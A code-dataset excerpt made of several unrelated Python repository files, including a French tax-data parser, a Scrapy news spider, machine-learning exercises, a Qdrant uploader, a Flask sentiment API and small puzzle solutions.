result = pandas.DataFrame()\n\n for year in years:\n file_regex = re.compile(\"^R20{}\".format(str(year)[2:4]))\n for filename in files:\n if file_regex.match(filename):\n log.info(\"Using file {} for year {}\".format(filename, year))\n break\n\n print(year)\n\n if year in [2001, 2004, 2005, 2006, 2007, 2008, 2009, 2010, 2011, 2012, 2013]:\n dgfip_denombrements = pandas.read_excel(os.path.join(dgfip_directory, filename))\n if year == 2003:\n dgfip_denombrements = pandas.read_excel(os.path.join(dgfip_directory, filename), skiprows = 4)\n\n if year in [2001, 2003]:\n regex = re.compile(\"^[0-9][A-Z]{2}\")\n dgfip_denombrements.code.fillna(\"\", inplace = True)\n dgfip_denombrements = dgfip_denombrements.set_index('code').filter(regex = regex, axis = 0)\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x.lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n dgfip_denombrements['year'] = year\n dgfip_denombrements.rename(columns = {'montant': 'value', 'Nombre': 'nombre'}, inplace = True)\n del dgfip_denombrements['nombre']\n\n # TODO:\n if year in [2005, 2006, 2007, 2008]:\n # continue\n regex = re.compile(\"[A-Z]{2}\")\n\n dgfip_denombrements = dgfip_denombrements.set_index('nom').filter(regex = regex, axis = 0)\n dgfip_denombrements.index.name = 'code'\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x.lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n print(dgfip_denombrements)\n boum\n # trouver un moyen de renommer les codes pour qu'il y ait le numéro des sections\n\n# dgfip_denombrements.rename(columns = {'nom': 'code'}, inplace = True)\n# for ind in dgfip_denombrements.index:\n# if re.match(\"[A-Z][I, J, K, O, P, Q, S, V, W, X]\", dgfip_denombrements.ix[ind]['code']):\n# print dgfip_denombrements.ix[ind]['code']\n# dgfip_denombrements.rename(\n# {dgfip_denombrements.ix[ind]['code']: \"1{}\".format(dgfip_denombrements.ix[ind]['code'])}) # ,inplace = True\n#\n# or\n# dgfip_denombrements = dgfip_denombrements.filter(items = ['nom'], regex = regex)\n#\n# dgfip_denombrements['code'] = dgfip_denombrements['nom']\n# for ind in dgfip_denombrements.index:\n# if re.match(\"[A-Z][I, J, K, O, P, Q, S, V, W, X]\", dgfip_denombrements.ix[ind]['nom']):\n# print dgfip_denombrements.ix[ind]['nom']\n# dgfip_denombrements.ix[ind]['code'] = \"1{}\".format(dgfip_denombrements.ix[ind]['nom'])\n#\n# dgfip_denombrements = dgfip_denombrements.set_index('code').filter(regex = regex, axis = 0)\n\n if year == 2004:\n regex = re.compile(\"^Z[0-9][A-Z]{2}\")\n dgfip_denombrements.case.fillna(\"\", inplace = True)\n dgfip_denombrements.drop_duplicates(['case'], inplace = True)\n dgfip_denombrements = dgfip_denombrements.set_index('case').filter(regex = regex, axis = 0)\n dgfip_denombrements.index.name = 'code'\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x[1:].lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n dgfip_denombrements.reset_index(inplace = True)\n\n dgfip_denombrements['year'] = year\n dgfip_denombrements.rename(columns = {'Montant': 'value'}, inplace = True)\n del dgfip_denombrements['Nombre'], dgfip_denombrements[u'libellé'], dgfip_denombrements['nom']\n\n if year in [2009, 2010, 2011, 2012]:\n regex = re.compile(\"^Z[0-9][A-Z]{2}\")\n dgfip_denombrements = dgfip_denombrements.set_index('nom').filter(regex = regex, axis = 0)\n dgfip_denombrements.index.name = 'code'\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x[1:].lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n dgfip_denombrements.reset_index(inplace = True)\n dgfip_denombrements['year'] = year\n\n if year == 2009:\n dgfip_denombrements.rename(columns = {'Montants': 'value', 'Nombre': 'nombre'}, inplace = True)\n else:\n dgfip_denombrements.rename(columns = {'montants': 'value'}, inplace = True)\n\n del dgfip_denombrements['maximal'], dgfip_denombrements['nombre']\n\n if year == 2013:\n regex = re.compile(\"^Z[0-9][A-Z]{2}\")\n dgfip_denombrements = dgfip_denombrements.set_index('nom').filter(regex = regex, axis = 0)\n dgfip_denombrements.index.name = 'code'\n new_variable_name_by_old = dict(\n (x, \"f{}\".format(x[1:].lower())) for x in dgfip_denombrements.index)\n dgfip_denombrements = dgfip_denombrements.rename(index = new_variable_name_by_old)\n dgfip_denombrements.reset_index(inplace = True)\n dgfip_denombrements['year'] = year\n dgfip_denombrements.rename(columns = {'ano': 'value'}, inplace = True)\n del dgfip_denombrements['pas_ano']\n\n result = pandas.concat((result, dgfip_denombrements))\n result.dropna(subset = ['value'], inplace = True) # dropping NA's\n\n return result.loc[result.value != 0].copy() # excluding 0 values\n\n\ndef create_denombrements_fiscaux_data_frame(year = None, years = None, overwrite = False):\n \"\"\"\n Generates the table with all the data from Dénombrements Fiscaux .\n\n Parameters\n ----------\n year : int\n year of DGFIP data (coincides with year of declaration)\n years : list of integers\n list of years of interest. Optional.\n\n Example\n --------\n >>> table_2013 = denombrements_fiscaux_df_generator(year = 2013)\n\n Returns the main table of dénombrements fiscaux for the year 2013.\n \"\"\"\n if year is not None and years is None:\n years = [year]\n\n log.info('Parsing dénombrements fiscaux raw data for the following years: {}'.format(years))\n # Data coming for openfisca xls file\n openfisca_denombrements = parse_openfisca_denombrements()\n openfisca_denombrements['origin'] = 'OF'\n\n # Data coming from IPP\n ipp_denombrements = parse_ipp_denombrements()\n ipp_denombrements['origin'] = 'IPP'\n\n df = pandas.concat([ipp_denombrements, openfisca_denombrements])\n # Drop real duplicates\n df = df.drop_duplicates(subset = ['year', 'code', 'value'])\n df = df.reset_index(drop=True)\n\n # Problematic duplicates\n dups = df.duplicated(['year', 'code']) | df.duplicated(['year', 'code'], keep = 'last')\n z = df.loc[dups].copy()\n # sum of two columns in IPP for year < 2007\n wrong_before_2007 = ['f5ne', 'f5oe', 'f5rd', 'f5ke', 'f5le', 'f5he', 'f5ie', 'f5qd']\n df = df.loc[~(df.code.isin(wrong_before_2007) & (df.year < 2007))]\n log.info('Remaining roblematic duplicates when merging IPP and OF \\n {}'.format(\n z.loc[~(z.code.isin(wrong_before_2007) & (z.year < 2007))]\n ))\n df = df.loc[df.year.isin(years)].copy() if years is not None else df.copy()\n\n # Data coming from DGFiP\n dgfip_denombrements = parse_dgfip_denombrements(years)\n dgfip_denombrements['origin'] = 'DGFiP'\n df2 = pandas.concat([dgfip_denombrements, df])\n\n # Drop real duplicates\n df2 = df2.drop_duplicates(subset = ['year', 'code', 'value'])\n df2 = df2.reset_index(drop=True)\n\n dups2 = df2.duplicated(['year', 'code']) | df2.duplicated(['year', 'code'], keep = 'last')\n errors = df2.loc[dups2].copy()\n\n wrong_codes = ['f5ne', 'f5oe', 'f5rd', 'f5ke', 'f5le', 'f4tq', 'f5hd',\n 'f5id', 'f5he', 'f5ie', 'f5qd', 'f3ve', 'f3vf', 'f3ve', 'f3vf', 'f7tf', 'f7tf', 'f2gr', 'f2ch', 'f2bg', 'f6el',\n 'f6st', 'f2bg', 'f7cd', 'f2gr', 'f2ch', 'f7cd', 'f6st', 'f6el']\n wrong_years = [2006, 2005, 2004, 2003]\n log.info('Remaining problematic duplicates when merging with DGFiP data \\n {}'.format(\n errors.loc[~(errors.code.isin(wrong_codes) | errors.year.isin(wrong_years))]\n ))\n df2 = df2.loc[~(df2.code.isin(wrong_codes) | (df2.year.isin(wrong_years)))]\n result = df2.loc[df2.year.isin(years)].copy() if years is not None else df2.copy()\n\n log.info('For now, we keep only DGFiP data')\n result = dgfip_denombrements.copy() # TODO: recoupement avec data OpenFisca & IPP\n\n if overwrite:\n save_df_to_hdf(result, 'denombrements_fiscaux.h5', 'montants')\n\n return result, errors\n\n\ndef build_section_code():\n openfisca_denombrements = parse_openfisca_denombrements()\n ipp_denombrements = parse_ipp_denombrements()\n df = pandas.concat([openfisca_denombrements.code, openfisca_denombrements.code])\n return df.unique()\n\n\ndef get_denombrements_fiscaux_data_frame(year = None, years = None, rebuild = False, overwrite = False,\n fill_value = numpy.nan):\n if year is not None and years is None:\n years = [year]\n if rebuild:\n return create_denombrements_fiscaux_data_frame(years = years, overwrite = overwrite)\n else:\n data_frame = import_from_hdf('denombrements_fiscaux.h5', 'montants')\n return data_frame.loc[data_frame.year.isin(years)].copy()\n\n\ndef save_df_to_hdf(df, hdf_filename, key):\n file_path = os.path.join(hdf_directory, hdf_filename)\n df.to_hdf(file_path, key)\n\n\ndef import_from_hdf(hdf_filename, key):\n file_path = os.path.join(hdf_directory, hdf_filename)\n store = pandas.HDFStore(file_path)\n df = store[key]\n return df\n\n\nif __name__ == '__main__':\n build_section_code()\n dgfip = parse_dgfip_denombrements(years = range(2008, 2009))\n print(dgfip)\n# denomb_fisc_all, errors = create_denombrements_fiscaux_data_frame(\n# years = range(2009, 2014),\n# overwrite = True,\n# )\n","repo_name":"taxipp/ipp-macro-series-parser","sub_path":"ipp_macro_series_parser/denombrements_fiscaux/denombrements_parsers.py","file_name":"denombrements_parsers.py","file_ext":"py","file_size_in_byte":29920,"program_lang":"python","lang":"fr","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18293690599","text":"import sys\nimport numpy as np\nimport cupy as cp\nif sys.version_info >= (3,):\n xrange = range\n\n\nis_gpu = True\n\nif is_gpu is True:\n mat = cp\nelse:\n mat = np\n\nnonspiking_mode = True # whether to run in non-spiking mode (real-valued outputs)\n\nuse_rand_phase_lengths = True # use random phase lengths (chosen from Wald distribution)\nuse_rand_plateau_times = False # randomly sample the time of each neuron's apical plateau potential\nuse_conductances = True # use conductances between dendrites and soma\nuse_broadcast = True # use broadcast (ie. feedback to all layers comes from output layer)\nuse_spiking_feedback = True # use spiking feedback\nuse_spiking_feedforward = True # use spiking feedforward input\n\nuse_symmetric_weights = False # enforce symmetric weights\nnoisy_symmetric_weights = False # add noise to symmetric weights\n\nuse_sparse_feedback = False # use sparse feedback weights\nupdate_feedback_weights = False # update feedback weights\nuse_backprop = False # use error backpropagation\nuse_apical_conductance = False # use attenuated conductance from apical dendrite to soma\nuse_weight_optimization = True # attempt to optimize initial weights\nuse_feedback_bias = False # use biases in feedback paths\ninitial_test = False # whether to do an initial test on the test set prior to training\n\nrecord_backprop_angle = False # record angle b/w hidden layer error signals and backprop-generated error signals\nrecord_loss = True # record final layer loss during training\nrecord_training_error = True # record training error during training\nrecord_training_labels = True # record labels of images that were shown during training\nrecord_phase_times = False # record phase transition times across training\nrecord_plateau_times = False # record plateau potential times for each neuron across training\nrecord_voltages = False # record voltages of neurons during training (huge arrays for long simulations!)\n\n# --- Jacobian testing --- #\nrecord_eigvals = False # record maximum eigenvalues for Jacobians\nrecord_matrices = False # record Jacobian product & weight product matrices (huge arrays for long simulations!)\nplot_eigvals = False # dynamically plot maximum eigenvalues for Jacobians\n\ndefault_simulations_folder = 'Simulations/' # folder in which to save simulations (edit accordingly)\nweight_cmap = 'bone' # color map to use for weight plotting\n\ndt = 1.0 # time step (ms)\nmem = int(10/dt) # spike memory (time steps) - used to limit PSP integration of past spikes (for performance)\n\nl_f_phase = int(50/dt) # length of forward phase (time steps)\nl_t_phase = int(50/dt) # length of target phase (time steps)\nl_f_phase_test = int(250/dt) # length of forward phase for tests (time steps)\n\nintegration_time = l_f_phase - int(30/dt) # time steps of integration of neuronal variables used for plasticity\nintegration_time_test = l_f_phase_test - int(30/dt) # time steps of integration of neuronal variables during testing\n\nlambda_max = 0.2*dt # maximum spike rate (spikes per time step)\n\n# kernel parameters\ntau_s = 3.0 # synaptic time constant\ntau_l = 10.0 # leak time constant\n\n# conductance parameters\ng_b = 0.6 # basal conductance\ng_a = 0.05 if use_apical_conductance else 0 # apical conductance\n\ng_l = 1.0/tau_l # leak conductance\ng_d = g_b # dendritic conductance in output layer\n\nE_E = 8 # excitation reversal potential\nE_I = -8 # inhibition reversal potential\n\n# steady state constants\nk_B = g_b/(g_l + g_b + g_a)\nk_D = g_d/(g_l + g_d)\nk_I = 1.0/(g_l + g_d)\n\n# weight update constants\nP_hidden = 20.0/lambda_max # hidden layer error signal scaling factor\nP_final = 20.0/(lambda_max**2) # final layer error signal scaling factor\n\ndef kappa(x):\n return (mat.exp(-x/tau_l) - mat.exp(-x/tau_s))/(tau_l - tau_s)\n\ndef get_kappas(n):\n return mat.array([kappa(i+1) for i in xrange(n)])\n\n# initialize kappas array\nkappas = mat.flipud(get_kappas(mem))[:, mat.newaxis] \n\nn_full_test = 10000 # number of examples to use for full tests (every epoch)\nn_quick_test = 100 # number of examples to use for quick tests (every 1000 examples)\n\nif nonspiking_mode:\n print(\"******** mode: nonspiking ********\")\n\n # parameters for non-spiking mode\n use_rand_phase_lengths = False\n use_rand_plateau_times = False\n use_conductances = False\n use_spiking_feedforward = False\n use_spiking_feedback = False\n record_phase_times = False\n record_plateau_times = False\n record_voltages = False\n\n l_f_phase = 2\n l_t_phase = 2\n l_f_phase_test = 2\n integration_time = 1\n integration_time_test = 1\n mem = 1\n\nif use_rand_phase_lengths:\n # minimum phase lengths\n min_l_f_phase = l_f_phase\n min_l_t_phase = l_t_phase","repo_name":"quackson/ML_HW","sub_path":"params.py","file_name":"params.py","file_ext":"py","file_size_in_byte":5042,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17929639554","text":"import numpy as np \nimport tensorflow as tf\nimport matplotlib.pyplot as plt\nimport pandas as pd\nfrom sklearn.model_selection import train_test_split\n\n# Importing the dataset\ndf = pd.read_csv(\"insurance_data.csv\")\n\nX_train, X_test, Y_train, Y_test = train_test_split(df[['age','affordibility']], df['bought_insurance'], test_size=0.2)\n\n# Scale the data\nX_train_scaled = X_train.copy()\nX_train_scaled['age'] = X_train_scaled['age']/100\n\nX_test_scaled = X_test.copy()\nX_test_scaled['age'] = X_test_scaled['age']/100\n\n# Build the model\nmodel = tf.keras.Sequential([\n tf.keras.layers.Dense(1, input_shape=(2,), activation='sigmoid', kernel_initializer='ones', bias_initializer='zeros')\n])\n\n# Compile the model\nmodel.compile(optimizer='adam', loss='binary_crossentropy', metrics=['accuracy'])\n\n# Train the model\nmodel.fit(X_train_scaled, Y_train, epochs=5000)\n\n# Evaluate the model\nprint(model.evaluate(X_test_scaled, Y_test))\n\n# Predict the model\nprint(model.predict(X_test_scaled))\n\n# Plot the model\nplt.scatter(X_test_scaled['age'], Y_test, color='red')\nplt.show()\nplt.scatter(X_test_scaled['age'], [1 if x>=0.5 else 0 for x in model.predict(X_test_scaled)], color='blue')\nplt.show()\n\ndef log_loss(y_true, y_predicted):\n epsilon = 1e-15\n y_predicted_new = [max(i, epsilon) for i in y_predicted]\n y_predicted_new = [min(i, 1-epsilon) for i in y_predicted_new]\n y_predicted_new = np.array(y_predicted_new)\n return -np.mean(y_true*np.log(y_predicted_new)+ (1-y_true)*np.log(1-y_predicted_new))\n\ndef sigmoid(x):\n return 1/(1+np.exp(-x))\n\ndef gradient_descent(age,affordability,Y_true,epochs,loss_threshold):\n w1 = w2 = 1\n bias = 0\n rate = 0.5\n n = len(age)\n for i in range(epochs):\n weighted_sum = w1*age + w2*affordability + bias\n Y_predicted = sigmoid(weighted_sum)\n loss = log_loss(Y_true,Y_predicted)\n w1d = (1/n)*np.dot(np.transpose(age),(Y_predicted-Y_true))\n w2d = (1/n)*np.dot(np.transpose(affordability),(Y_predicted-Y_true))\n bias_d = np.mean(Y_predicted-Y_true)\n w1 = w1 - rate*w1d\n w2 = w2 - rate*w2d\n bias = bias - rate*bias_d\n print(f'Epoch:{i}, w1:{w1}, w2:{w2}, bias:{bias}, loss:{loss}')\n if loss<=loss_threshold:\n break\n return w1,w2,bias\n\nprint(gradient_descent(X_train_scaled['age'],X_train_scaled['affordibility'],Y_train,10000,0.4631))\n","repo_name":"akshat12000/Data-Science-Run-And-Learn-Series","sub_path":"Deep Learning/Gradient Descent/Gradient Descent.py","file_name":"Gradient Descent.py","file_ext":"py","file_size_in_byte":2378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19958493934","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport re\nimport requests\nfrom scrapy.http import Request\nfrom urllib import parse\nfrom ArticleSpider.items import kjjysItem, kjjysItemLoader\nfrom selenium import webdriver\nfrom scrapy.xlib.pydispatch import dispatcher\nfrom scrapy import signals\nfrom ArticleSpider.utils.common import get_md5\nimport datetime\nimport platform\nfrom pyvirtualdisplay import Display\n\n\ndef get_my_content(url, value):\n new_content = []\n articleorign = '

' \\\n '原文链接

'.format(url)\n for cvalue in value:\n cvalue = cvalue[:-6]\n cvalue = cvalue + articleorign\n new_content.append(cvalue)\n return new_content\n\n\ndef remove_comment_tags(value):\n # 去掉tags中提取的评论\n if len(value) > 1:\n return value[1]\n else:\n return value[0]\n\n\n# 科学网 头条和要闻 数据爬取\nclass ScienceSpider(scrapy.Spider):\n name = 'science'\n allowed_domains = ['news.sciencenet.cn']\n start_urls = ['http://news.sciencenet.cn/']\n\n headers = {\n \"HOST\": \"www.news.sciencenet.cn\",\n \"Referer\": \"http://news.sciencenet.cn/\",\n 'User-Agent': \"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36\"\n }\n\n def __init__(self, **kwargs):\n sysstr = platform.system()\n if sysstr == 'Windows':\n self.browser = webdriver.Chrome(executable_path=\"E:/pythonDriver/chromedriver.exe\")\n else:\n self.display = Display(visible=0, size=(800, 600))\n self.display.start()\n self.browser = webdriver.Chrome(executable_path=\"/usr/bin/chromedriver\")\n super(ScienceSpider, self).__init__()\n dispatcher.connect(self.spider_closed, signals.spider_closed)\n\n def spider_closed(self,spider):\n #当爬虫退出时关闭chrom\n print(\"spider closed\")\n sysstr = platform.system()\n if sysstr == 'Windows':\n self.browser.quit()\n else:\n self.browser.quit()\n self.display.stop()\n\n def parse(self, response):\n \"\"\"\n 1. 获取文章列表页中的文章url并交给scrapy下载后并进行解析\n 2. 获取下一页的url并交给scrapy进行下载, 下载完成后交给parse\n \"\"\"\n # 解析列表页中的所有文章url并交给scrapy下载后并进行解析\n if response.status == 404:\n self.fail_urls.append(response.url)\n self.crawler.stats.inc_value(\"failed_url\")\n if response.url in ['http://news.sciencenet.cn/topnews.aspx','http://news.sciencenet.cn/indexyaowen.aspx']:\n post_nodes = response.xpath(\"//*[@id='mleft3']/table/tbody/tr/td/table/tbody/tr[last()]\")\n type_name = response.css(\"#mleft2 ::text\").extract_first(\"\")\n type_name = type_name.strip()\n for post_node in post_nodes:\n post_url = post_node.css(\"a::attr(href)\").extract_first(\"\")\n title = post_node.css(\" a::text\").extract_first(\"\")\n publish_date = post_node.xpath(\"td[3]/text()\").extract_first(\"\")\n publish_date = publish_date.strip()\n publish_date = publish_date.replace('/', '-')\n compare_date = datetime.datetime.now()\n compare_date = datetime.datetime.strptime(compare_date.strftime(\"%Y-%m-%d %H:%M:%S\"), \"%Y-%m-%d %H:%M:%S\").date()\n publishDate = datetime.datetime.strptime(publish_date, \"%Y-%m-%d %H:%M:%S\").date()\n if publishDate >= compare_date:\n print(\"=======get it==========\")\n yield Request(url=parse.urljoin(response.url, post_url), headers=self.headers, meta={\"publish_date\": publish_date, \"type_name\": type_name, \"title\": title}, callback=self.parse_detail)\n else:\n post_nodes = response.css(\".ltitbg a\")\n for post_node in post_nodes[0:3]:\n post_url = post_node.css(\"::attr(href)\").extract_first(\"\")\n print(\"out===url\")\n print(post_url)\n yield Request(url=parse.urljoin(response.url, post_url), headers=self.headers, callback=self.parse)\n\n def parse_detail(self, response):\n\n type_name = response.meta.get(\"type_name\", \"\")\n publish_date = response.meta.get(\"publish_date\", \"\") # 发布时间\n item_loader = kjjysItemLoader(item=kjjysItem(), response=response)\n image_url = response.css(\"#content1 img::attr(src)\").extract()\n title = response.meta.get(\"title\", \"\")\n title = title.strip()\n\n content = response.css(\"#content1\").extract()\n content = get_my_content(response.url, content)\n content = \"\".join(content)\n\n new_image_url = []\n if len(image_url) > 0:\n for in_url in image_url:\n in_url = parse.urljoin(response.url, in_url)\n new_image_url.append(in_url)\n else:\n item_loader.add_value(\"front_image_path\", '--')\n\n item_loader.add_value(\"url\", response.url)\n item_loader.add_value(\"url_object_id\", get_md5(response.url))\n if len(new_image_url) > 0:\n item_loader.add_value(\"front_image_url\", new_image_url)\n # else:\n # item_loader.add_value(\"front_image_url\", [\"\"])\n item_loader.add_value(\"source_net\", self.start_urls[0])\n item_loader.add_value(\"source_name\", '科学网')\n item_loader.add_value(\"type_name\", type_name)\n item_loader.add_value(\"title\", title)\n item_loader.add_value(\"content\", content)\n\n item_loader.add_value(\"publish_time\", publish_date)\n item_loader.add_value(\"crawl_time\", datetime.datetime.now())\n article_item = item_loader.load_item()\n\n yield article_item\n","repo_name":"dasinWalk/ArticleSpider","sub_path":"ArticleSpider/spiders/science.py","file_name":"science.py","file_ext":"py","file_size_in_byte":5921,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"73142340328","text":"#! /usr/bin/env python\nimport sys\nimport time\n\nfrom sklearn.metrics import accuracy_score\n\nfrom tools.email_preprocess import preprocess\n\n# your imports go here\nfrom sklearn.svm import SVC\n\n\ndef find_best(features_train, features_test, labels_train, labels_test,\n n=None, **params):\n param_sets = []\n for C in (1.0, 10.0, 100.0, 1000.0, 10000.0):\n param_sets.append({\n 'kernel': params.get('kernel', 'linear'),\n 'gamma': params.get('gamma', 'scale'),\n 'C': C,\n })\n\n accuracy_map = []\n for params in param_sets:\n print('=' * 70)\n score = do_test(\n features_train, features_test, labels_train, labels_test,\n n=n, **params)\n accuracy_map.append((score, params))\n\n for score, params in sorted(accuracy_map, key=lambda i: i[0]):\n print(f'{params} => {score}')\n\n\ndef do_test(features_train, features_test, labels_train, labels_test,\n n=None, **params):\n if n is not None:\n n = int(n)\n print(f'{params}')\n clf = SVC(**params)\n\n start = time.time()\n clf.fit(features_train[:n], labels_train[:n])\n delta_fit = time.time() - start\n print(f'Training complete in {delta_fit:.2f}s')\n\n start = time.time()\n labels_predict = clf.predict(features_test)\n delta_predict = time.time() - start\n print(f'Prediction complete in {delta_predict:.2f}s')\n print(f'10 => {labels_predict[10]}')\n print(f'26 => {labels_predict[26]}')\n print(f'50 => {labels_predict[50]}')\n print(f'Chris => {sum(labels_predict)}')\n\n score = accuracy_score(labels_predict, labels_test)\n print(f'Accuracy {100 * score:.2f}%')\n\n return labels_predict, score\n\n\ndef main():\n features_train, features_test, labels_train, labels_test = preprocess()\n do_test(features_train, features_test, labels_train, labels_test,\n kernel='rbf', gamma='auto', C=10000.0)\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"clayg/udacity","sub_path":"ud120/3.28/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1967,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"25978428904","text":"from itertools import count\nfrom typing import Iterable, Any, Tuple, Union, Optional, Generator\n\nfrom qdrant_client.http import SyncApis\nfrom qdrant_client.http.models import Batch, PointsList, PointStruct\nfrom qdrant_client.uploader.uploader import BaseUploader\n\n\ndef upload_batch(openapi_client: SyncApis, collection_name: str, batch: Union[Tuple, Batch]) -> bool:\n ids_batch, vectors_batch, payload_batch = batch\n\n # Make sure we do not send too many ids in case there is an iterable over vectors,\n # and we do not know how many ids are required in advance\n if len(ids_batch) > len(vectors_batch):\n ids_batch = ids_batch[:len(vectors_batch)]\n\n if payload_batch is not None:\n payload_batch = list(payload_batch)\n else:\n payload_batch = (None for _ in count())\n\n points = [\n PointStruct(\n id=idx,\n vector=vector,\n payload=payload,\n ) for idx, vector, payload in zip(ids_batch, vectors_batch, payload_batch)\n ]\n\n openapi_client.points_api.upsert_points(\n collection_name=collection_name,\n point_insert_operations=PointsList(\n points=points\n )\n )\n return True\n\n\nclass RestBatchUploader(BaseUploader):\n\n def __init__(self, uri: str, collection_name: str, **kwargs: Any):\n self.collection_name = collection_name\n self.openapi_client: SyncApis = SyncApis(host=uri, **kwargs)\n\n @classmethod\n def start(cls, collection_name: Optional[str] = None, uri: str = \"http://localhost:6333\", **kwargs: Any) -> 'RestBatchUploader':\n if not collection_name:\n raise RuntimeError(\"Collection name could not be empty\")\n return cls(uri=uri, collection_name=collection_name, **kwargs)\n\n def process(self, items: Iterable[Any]) -> Generator[bool, None, None]:\n for batch in items:\n yield upload_batch(self.openapi_client, self.collection_name, batch)\n","repo_name":"prakha/webUIBackend","sub_path":"myvenv/lib/python3.7/site-packages/qdrant_client/uploader/rest_uploader.py","file_name":"rest_uploader.py","file_ext":"py","file_size_in_byte":1930,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"16014601653","text":"class BuildInfo(object):\n u\"\"\"Container with builder flags and data, as stored in elements, to guide conditional \n e.build( ) and e.buildCss( ) and e.buildFlat( ) calls.\n Note that these attribute and flags can be defined specifically per element, so they\n cannot be part of a view.\n \"\"\"\n def __init__(self, **kwargs):\n self.title = None # Can be used to overwrite the standard name/title of an element.\n self.description = None\n self.keyWords = None\n # Urls for \n self.webFontsUrl = 'fonts/webfonts.css'\n self.favIconUrl = None\n self.jsUrls = None\n self.appleTouchIconUrl = None\n self.jQueryUrl = 'http://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'\n self.jQueryUrlSecure = 'https://ajax.googleapis.com/ajax/libs/jquery/1.8.3/jquery.min.js'\n self.mediaQueriesUrl = 'http://code.google.com/p/css3-mediaqueries-js'\n # Device\n self.viewPort = \"width=device-width, initial-scale=1.0\"\n # Fonts\n self.webFonts = [\n 'http://fonts.googleapis.com/css?family=Bree+Serif',\n 'http://fonts.googleapis.com/css?family=Droid+Sans:400,700',\n ]\n # Define file paths where to read content, instead of constructing by the builder.\n self.cssPath = None\n self.htmlPath = None\n self.headPath = None\n self.bodyPath = None\n\n for name, value in kwargs.items():\n assert hasattr(self, name) # Check only to set attributes that are supported by default value.\n setattr(self, name, value)\n\n","repo_name":"enathu/PageBot","sub_path":"Lib/pagebot/contexts/builders/buildinfo.py","file_name":"buildinfo.py","file_ext":"py","file_size_in_byte":1596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"2505171482","text":"#!/usr/bin/python\n\ndef fullycontains(range1, range2):\n min1, max1 = map(int, range1.split('-'))\n min2, max2 = map(int, range2.split('-'))\n if min1 >= min2 and max1 <= max2:\n return True\n elif min2 >= min1 and max2 <= max1:\n return True\n else:\n return False\n\n\ndef overlaps(range1, range2):\n min1, max1 = map(int, range1.split('-'))\n min2, max2 = map(int, range2.split('-'))\n firstset = set(range(min1, max1 + 1))\n secondset = set(range(min2, max2 + 1))\n return not firstset.isdisjoint(secondset)\n\n\ndef main():\n with open('input.txt') as inputfile:\n countcontains = 0\n countoverlaps = 0\n for line in inputfile:\n elf1, elf2 = line[:-1].split(',')\n if fullycontains(elf1, elf2):\n countcontains += 1\n if overlaps(elf1, elf2):\n countoverlaps += 1\n print(f'Part 1: {countcontains}')\n print(f'Part 2: {countoverlaps}')\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"eckuru/aoc2022","sub_path":"4/day4.py","file_name":"day4.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"15986582551","text":"from textblob import TextBlob\nfrom flask_cors import CORS\n# TextBlob(sentence).sentiment\n\nfrom flask import Flask, jsonify, request\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/sentiment', methods=['POST'])\ndef predict_sentiment():\n data = request.get_json()\n sentence = data['sentence']\n sentiment = TextBlob(sentence).sentiment\n score = sum(sentiment)/len(sentiment)\n if score > 0.5:\n res = \"Positive\"\n else:\n res = \"Negative\"\n return jsonify({\"sentiment\": res})\n\n@app.route('/', methods=['GET'])\ndef hello():\n return jsonify({\"response\":\"This is Sentiment Application\"})\n\nif __name__ == '__main__':\n app.run(host=\"0.0.0.0\", threaded=True, port=5000)","repo_name":"ashutosh1919/deeplearning-flask-react-app","sub_path":"sentiment-analysis-flask/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"53"} +{"seq_id":"33713747068","text":"def Delete_node(node):\r\n if dic[node]:\r\n nd = dic[node]\r\n for i in nd:\r\n Delete_node(i)\r\n # 자식들을 지운 후에 본인 삭제\r\n del dic[node]\r\n else:\r\n # 자식 node가 없으면 그냥 삭제\r\n del dic[node]\r\n\r\n\r\nn = int(input())\r\ndic = {}\r\nlst = list(map(int, input().split()))\r\n\r\nfor i in range(n):\r\n # tree 번호는 i\r\n dic[i] = []\r\n\r\nfor i in range(n):\r\n # root는 -1이므로 패스\r\n if lst[i] == -1:\r\n pass\r\n else:\r\n # 해당 부모에 자식 번호 넣어두기\r\n dic[lst[i]].append(i)\r\n\r\n# print(dic)\r\n# 지울 노드번호\r\nremove_node = int(input())\r\n# 지우기\r\nDelete_node(remove_node)\r\n\r\nfor k in dic.keys():\r\n # 만약 일직선일경우..\r\n if remove_node in dic[k]:\r\n dic[k].remove(remove_node)\r\n\r\n# leaf node 개수\r\nresult = 0\r\nif dic:\r\n for k, v in dic.items():\r\n if len(v)==0:\r\n result+=1\r\n# print(dic)\r\nprint(result)","repo_name":"aeriheo/study","sub_path":"2월 